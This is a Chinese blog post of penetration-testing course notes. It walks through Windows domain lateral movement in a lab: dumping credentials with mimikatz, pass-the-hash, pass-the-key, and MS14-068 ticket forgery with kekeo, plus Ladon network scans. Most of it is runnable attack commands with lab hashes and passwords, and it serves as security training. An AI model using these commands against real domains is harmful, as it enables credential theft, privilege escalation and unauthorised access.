p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

这篇具有很好参考价值的文章主要介绍了p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

数据来源

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

Kerberos 协议具体工作方法,在域中,简要介绍一下:

  • 客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用krbtgt 密码 hash 作为密钥),发送给 kdc(域控),kdc 对用户进行检测,成功之后创建 TGT(Ticket-Granting Ticket)
  • 将 TGT 进行加密签名返回给客户机器,只有域用户 krbtgt 才能读 取 kerberos 中 TGT 数据
  • 然后客户机将 TGT 发送给域控制器 KDC 请求 TGS(票证授权服 务)票证,并且对 TGT 进行检测
  • 检测成功之后,将目标服务账户的 NTLM 以及 TGT 进行加密,将 加密后的结果返回给客户机
     

概念 (这三种方式的密文都通过mimikatz工具获取)

  • PTH (pass the hash)      # 利用 LM 或 NTLM 的值进行的渗透测试
  • PTT (pass the ticket)      # 利用的票据凭证 TGT 进行的渗透测试
  • PTK (pass the key)        # 利用的 ekeys aes256 进行的渗透测试

PTH和PTK

  • PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。
  • 如果禁用了 ntlm 认证,PsExec 无法利用获得的 ntlm hash 进行远程连接,但是使用 mimikatz 还是可以攻击成功。对于 8.1/2012r2,安装补丁 kb2871997 的 Win 7/2008r2/8/2012 等,可以使用 AES keys 代替 NT hash 来实现 ptk 攻击
# mimikatz 简单使用
# 工具运行后先调试
privilege::debug 
          
# 获取 NTLM
sekurlsa::logonPasswords
        
# 获取AES
sekurlsa::ekeys

总结:KB2871997 补丁后的影响

  • PTH:打补丁前任意用户都可以连接打了补丁后只能 administrator 用户才可以连接

  • PTK:打补丁前不能连接打补丁后才能任意用户都可以连接(采用 aes256 连接,有两种一个aes256,另一个aes128  )

 使用 mimikatz 工具进行信息收集的截图:(文章后面会有详细的使用教程)

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

PTT

  • PTT 攻击的部分就不是简单的 NTLM 认证了,它是利用 Kerberos 协议进行攻击的,这里就介绍三种常见的攻击方法:
  • MS14-068,Golden ticket,SILVER ticket。简单来说就是将连接合法的票据注入到内存中实现连接。
  • Golden ticket(黄金票据),SILVER ticket(白银票据)属于权限维持技术
  • MS14-068 基于漏洞,造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是 kb3011780

演示案例:

  • 域横向移动 PTH 传递-Mimikatz
  • 域横向移动 PTK 传递-Mimikatz
  • 域横向移动 PTT 传递-MS14068&kekeo&local
  • 国产 Ladon 内网杀器测试验收-信息收集,连接等

Mimikatz官网:GitHub - gentilkiwi/mimikatz:一个玩Windows安全的小工具

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

案例 1-域横向移动 PTH 传递-mimikatz

PTH ntlm 传递

实验背景:你已经拿下一台内网主机,现在在这台内网主机进账号密文信息收集,看能不能撞库,其他内网主机的密文也是这个从而扩大影响

1)首先使用mimikatz收集一下目标主机保存在缓存中的账号信息

使用cmd启动mimikatz工具

privilege::debug     # 调试
 
sekurlsa::ekeys      # 获取 aes

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

sekurlsa::logonpasswords   # 收集PTH攻击方式的NTLM、LM信息

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

2)尝试攻击 - 我这里在win2007(域成员机/子机)尝试攻击2008虚拟机(域主机/域控制机)

# 切换到mimikatz工具目录下
cd C:\Users\zhangsan\Desktop\mimikatz_trunk\x64

# 启动
mimikatz

# 调试
privilege::debug

# 未打补丁下的工作组及域连接:
# 攻击
#                      账号          域/域名称我这里是ZS            NTLM值
sekurlsa::pth /user:administrator /domain:ZS /ntlm:442285a710fe49913e8b9a2861781eec
# 或 连接本地工作组
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

        我感觉这个攻击方式不是很实用,我在域子机2007中执行命令提示没有权限,这个是域账号,如果现实中我都有域管理员权限了我还攻击他干嘛,域管理员账户可以登录所有的域成员机,这里我能想到这个攻击方式的作用就是,通过攻击获取到域管理员主机的cmd权限然后对域管理员那台机器进行一些操作(查看、下载、删除数据),解决:在win2007等域管理员账户,或用管理员账户打开cmd

先在现在的win2007(域成员机)获取域主机的ip地址,方便后面的攻击

# 判断主域(域主机/域控/域的控制机)
net time /domain

# ping主机名,获取对应的ip
ping WIN-I7NPA55KMBD.zs.com

这里就得到域主机的ip是:192.168.1.62 

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

 这里切换域管理员账户,继续执行攻击命令

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

然后就可以继续进行下一步攻击

# 尝试连接,确定攻击的目标地址(这里就用我们刚才获取到的域主机ip地址)
net use \\192.168.1.62 \c$
# 要执行的命令 域主机ip   要操作的文件目录
dir \\192.168.1.62\c$

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

案例 2-域横向移动 PTK 传递 - mimikatz

PTK aes256 传递

打补丁后的工作组及域连接:(不打补丁PTK是连接不了的

使用cmd启动mimikatz工具

privilege::debug     # 调试
 
sekurlsa::ekeys      # 获取 aes

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

sekurlsa::pth /user:mary /domain:ZS /aes256:e25cad5bcfdeb9191e2a2b5b87402659a9ae89197d55578b011eafed64e56fde

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

 然后就可以继续进行下一步攻击(案例1演示了收集域主机的ip,这里就不写了)

# 尝试连接,确定攻击的目标地址(这里就用我们刚才获取到的域主机ip地址)
net use \\192.168.1.62 \c$
# 要执行的命令 域主机ip   要操作的文件目录
dir \\192.168.1.62\c$

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

尝试给靶机打补丁,搞不了,放弃了,(如果是现实中我们也不需要知道目标有没有打补丁,无非就两个结果:没打:使用案例1的方式攻击、打了:使用当前案例的方式攻击

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

案例 3-域横向移动 PTT 传递-ms14068&kekeo&本地

第一种利用漏洞:MS14-068  下载:https://raw.githubusercontent.com/abatchy17/WindowsExploits/master/MS14-068/MS14-068.exe

能实现普通用户直接获取域控 system 权限(也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变成域管理员权限,然后该域用户就可以控制整个域的所有机器了。)

一样是在win2007(域成员机)攻击win2008(域控) 

1)MS14-068 powershell 执行

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

2)执行一些命令:查看当前用户sid信息、删除用户凭证并伪造用户凭证、

# 查看当前 sid  (500是管理员、1000以上不普通用户)
whoami /user

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

切换账户再来

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

在普通的用户权限下使用mimikatz工具会报错的,可以演示一下

privilege::debug

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

不过可以在该工具中删除当前账号的凭证

kerberos::purge   # 清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

查看凭证验证一下刚才的清空

# 查看凭证列表
klist

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

伪造凭证 

        一些参数的解释:MS14-068.exe (自己下载的工具)域成员名(就是当前域成员机的登录用户名) 域名域域控ip(上面的案例有介绍过如何获取)域成员密码(就是当前登录的账号密码)

# 利用 ms14-068 生成 TGT 数据
MS14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u zhangsan@zs.com -s S-1-5-21-823002632-3515170821-2603063757-1106 -d 192.168.1.62 -p 207080sA

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

3)将票据注入到内存中

可先输入:klist     # 查看当前的凭证列表是否为空再继续操作

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

# 在mimikatz工具中执行下面的命令
#                票据文件名 
kerberos::ptc TGT_zhangsan@zs.com.ccache

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

输入:klist    # 验证一下

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

4)开始攻击 

# 查看域名
net time /domain

# 利用
# 操作命令  域控名            要操作的目录
dir \\WIN-I7NPA55KMBD.zs.com\c$

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

第二种利用工具 kekeo

下载地址:github.com

方式一: (不推荐,管理员账户才行而且操作繁琐)

1)生成票据

# 生成票据              域用户名      域名                   NTLM值
kekeo "tgt::ask /user:administrator /domain:zs.com /ntlm:442285a710fe49913e8b9a2861781eec"

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

2) 导入票据

# 查看凭证
klist

# 如果存在之前的凭证就清除掉
kerberos::purge   # 清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递​ 

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

导入票据

# 导入票据           票据文件名
kerberos::ptt TGT_administrator@ZS.COM_krbtgt~zs.com@ZS.COM.kirbi

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

3)攻击

# 查看域名
net time /domain

# 利用
# 操作命令  域控名            要操作的目录
dir \\WIN-I7NPA55KMBD.zs.com\c$

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

方式二:(推荐,操作简单,普通用户就好)(参考)

1、首先打开cmd输入下面的命令清空之前凭证

klist purge

 p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

2、直接生成有权限的凭证

#                                域名      普通域账号           密码
kekeo "exploit::ms14068 /domain:zs.com /user:zhangsan /password:207080sA /ptt"

 p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

3、直接就可以进行攻击了(dir 域控或者 PsExec 连接到域控了)

# 查看域名
net time /domain

# 利用
# 操作命令  域控名            要操作的目录
dir \\WIN-I7NPA55KMBD.zs.com\c$

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

第三种利用本地票据(需管理权限)

前提是之前连接过,所以有本地票据,但是票据会过期,有时间限制(10小时)

这个我感觉不实用,就不演示了

privilege::debug
sekurlsa::tickets /export
kerberos::ptt xxxxxxxxxx.xxxx.kirbi

总结:ptt 传递不需本地管理员权限,连接时主机名连接,基于漏洞,工具,本地票据 

案例 4-国产 Ladon内网杀器测试验收

信息收集-协议扫描-漏洞探针-传递攻击等

官网:GitHub - k8gege/Ladon: Ladon大型内网渗透工具

下载地址:https://github.com/k8gege/Ladon/archive/refs/heads/master.zip

使用参考  (参考)

 这里需要注意他的可执行文件名改成Ladon911.exe了使用时命令也要改,或者直接改这个文件名:

  • 目标主机进行存活探测、MAC地址探测及主机名探测

        Ladon.exe 192.168.1.0/24 ONlinePC

  • 探测主机是否存活

        Ladon.exe 192.168.1.0/24 ONlineIP

  • 对其目标主机进行禁ping扫描

        Ladon.exe noping 192.168.1.100

  • 对其目标主机网段进行禁ping端口开放扫描

        Ladon.exe noping 192.168.1.100 PortScan

  • 对其目标主机网段进行禁ping指定端口3389扫描

        Ladon.exe noping 192.168.1.100 PortScan 3389

  • 对其进行禁ping扫描其是否存在MS17010漏洞

        Ladon.exe 192.168.1.0/24 MS17010

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

这个工具功能挺多的,可以自己看官网,这个工具的官网是中文的还挺稀奇

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递文章来源地址https://www.toymoban.com/news/detail-428863.html

涉及资源

  • GitHub - gentilkiwi/kekeo: A little toolbox to play with Microsoft Kerberos in C
  • https://github.com/k8gege/Ladon
  • 暗月免杀mimikatz
  • MS14-068/MS14-068.exe at master · ianxtianxt/MS14-068 · GitHub

到了这里,关于p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网安全“小迪安全课堂笔记”域横向

    DMZ,是英文“demilitarized zone”的缩写,中文名称为“隔离区”,也称“非军事化区”。它是为了解决安装防火墙后外部网络的访问用户不能访问内部网络服务器的问题,而设立的一个非安全系统与安全系统之间的缓冲区。该缓冲区位于企业内部网络和外部网络之间的小网络区

    2024年02月04日
    浏览(45)
  • 【内网安全】搭建网络拓扑,CS内网横向移动实验

    实验拓扑结构如下: **攻击者win10地址:**192.168.8.3 dmz win7地址: 10.9.75.49 172.16.1.1 **DC server2008地址:**172.16.1.254 CS服务器 kali: 10.9.75.171 1、搭建CS服务器,CS客户端连接 攻击者充当CS客户端连接 开启监听 生成木马 攻击者win10 攻击者访问dmz的Web服务器,上传一句话木马,蚁剑连

    2024年02月03日
    浏览(46)
  • 70内网安全-域横向内网漫游Socks代理隧道技术(下)

              这节课解决代理的问题, 他是内网里面的穿透技术,隧道主要安全设备和流量监控的拦截问题,我们在做渗透的时候需要回显数据或者一些重要的信息,走的协议不一样,tcp/ip有七层, 在不同层里面有不同的协议,有一些协议会受到防火墙,过滤设备和流量检测

    2024年02月03日
    浏览(43)
  • 【内网安全-横向移动】IPC$连接--->计划任务--->上线

    目录 一、信息收集(目标用户密码) 1、简述 1、收集信息充当字典 2、收集方法 二、横向移动 1、ipc$ 2、at命令 3、sc命令: 4、schtasks(计划任务) 三、利用示例 1、流程: 2、示例: 四、工具 1、cs插件---LSTAR - Aggressor 2、impacket-atexec 1、收集信息充当字典 1) 目标字典 :域内网

    2024年01月16日
    浏览(39)
  • 【内网安全-横向移动】WMI-WMIC命令&相关内网工具

    目录 一、WMI 1、简述:  1)官方介绍: 2)优点: 3)条件: 4)不足: 5)WMIC管理命令: 6)相关工具:  2、上线: 1、wmic 2、impacket-wmiexec 3、wmicmd.exe 4、WMIHACKER  1)官方介绍: WMI 具有 管理员 和 WMI 提供 程序编写器 使用的多个命令行工具 WMI 命令行工具 - Win32 apps | Micros

    2024年01月22日
    浏览(49)
  • 内网安全:横向传递攻击( RDP || Cobalt Strike )

    横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.( 传递攻击主

    2024年02月10日
    浏览(41)
  • 内网安全:WMI协议与SMB协议横向移动

    目录 网络拓扑图 网络环境说明 WMI协议 SMB协议 域内信息收集 WMI协议 - 横向移动 利用方式一:wmic命令 利用方式一:cscript 利用方式一:impacket SMB协议 - 横向移动 利用方式一:psexec 利用方式二:psexec.exe 利用方式三:CS插件 利用方式四:Impacket-smbexec 利用方式五:services 域横

    2024年02月11日
    浏览(52)
  • 66 内网安全-域横向批量at&schtasks&impacket

    传递攻击是建立在明文和hash值的一个获取基础上的攻击,也是在内网里面常见协议的攻击,这篇文章主要讲at 我们现在讲的话是围绕webserver被入侵,他有一个相当外网接口,进去之后,通过webserver来实现渗透其它的主机加上这个域控 横向渗透明文传递atschtasks 在拿下一台内网

    2024年02月08日
    浏览(35)
  • 66内网安全-域横向批量at&schtask&impacket

    域环境下面的传递工具,分为两类。一个是传递一个是漏洞, 传递的第一个协议atschtask 这里老师给了每一个靶机的账户以及密码,观察一下其规律性, 在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息(明文密码或者hash值)后,如何横向渗透拿下更多的主机?

    2024年02月04日
    浏览(29)
  • 72 内网安全-域横向CS&MSF联动及应急响应初识

    权限维持留到后面在补充,先把后面的知识点给大家讲起来,因为权限维持它是我们前期如果拿到权限之后,能做的事情,前期没有拿到权限的话,这个东西是个多余的技术,所以我们还是比较偏向于攻击方面,像权限维持是为了自身知识的全面性才讲的 CS和msf的联动,这个

    2024年02月03日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包